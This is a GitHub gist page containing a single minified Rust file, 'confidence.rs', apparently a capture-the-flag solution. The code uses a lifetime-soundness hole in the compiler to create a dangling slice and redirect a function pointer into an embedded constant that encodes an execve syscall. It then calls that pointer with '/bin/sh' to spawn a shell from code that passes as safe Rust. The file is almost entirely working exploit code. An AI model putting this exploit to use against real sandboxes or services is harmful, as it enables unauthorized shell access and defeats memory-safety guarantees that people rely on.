moratorium08/confidence.rs

Created March 21, 2020 09:06

Star 1 You must be signed in to star a gist
Fork 1 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/moratorium08/0342a216e31437bb60261b7a4a836096.js"></script>
Save moratorium08/0342a216e31437bb60261b7a4a836096 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

confidence.rs

fn a(_:u64,_:u64){print!("{}",0x50f0000003bb8u64)}fn b(_:u64,_:u64){}fn h<'a,'b,T>(_:&'a&'b(),v:&'b mut[T])->&'a mut[T]{v}#[inline(never)]fn g<'a,T:Copy>(x:T)->&'a mut[T]{let f:fn(_,_)->_=h;print!("{:p}",&x);f(&&(),&mut[x;0x100])}pub fn main(){let x=g(0u64);let y=g(if x.as_ptr()as u64>>1>0{a}else{b});x[4]+=0x18f8;y[4]("/bin/sh\0".as_ptr()as _,0)}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment